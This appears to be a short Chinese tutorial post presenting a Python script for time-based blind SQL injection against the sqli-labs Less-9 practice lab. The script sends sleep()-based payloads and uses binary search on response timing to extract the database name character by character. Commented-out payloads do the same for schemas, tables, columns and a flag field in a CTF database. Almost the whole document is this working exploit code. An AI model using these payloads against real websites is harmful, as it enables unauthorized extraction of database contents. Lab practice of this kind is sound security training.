mysql基于时间的盲注，使用python爆破库名

mysql基于时间的盲注

使用python代码进行爆破库名

import requests
import time

s = requests.session()  # 创建session对象后，才可以调用对应的方法发送请求。
url = 'http://192.168.2.101/sqli-labs-master/Less-9/?id='
flag = ''
i = 0
while True:
    i = i + 1
    low = 32
    high = 127
    while low < high:
        mid = (low + high) // 2
        # 查询数据库：
        payload = f'1\'%0cand%0cif((ascii(substr(database(),{i},1))>{mid}),1,sleep(5))--+'
        # 查询数据库：payload = f'1\'%0cand%0cif((ascii(substr((select group_concat(schema_name)from information_schema.schemata),{i},1))>{mid}),1,sleep(3))--+'

        # 查询数据表：payload = f'1\'%0cand%0cif(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=\'ctfshow\')),{i},1))>{mid},1,sleep(3))--+'
        # 查询表字段：payload = f'1\'%0cand%0cif(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="flagug")),{i},1))>{mid},1,sleep(3))--+'
        # 查询字段中信息：payload = f'1\'%0cand%0cif(ascii(substr((select(flag4a23)from(ctfshow.flagug)),{i},1))>{mid},1,sleep(3))--+'
        #payload = f'1\'%0cand%0cif(ascii(substr((select(flag4a23)from(ctfshow.flagug)),{i},1))>{mid},1,sleep(3))--+'

        stime = time.time()
        url1 = url + payload
        r = s.get(url=url1)
        r.encoding = "utf-8"
        # print(payload)
        if time.time() - stime < 3:
            low = mid + 1
        else:
            high = mid
    if low != 32:
        flag += chr(low)
    else:
        break
    print(flag)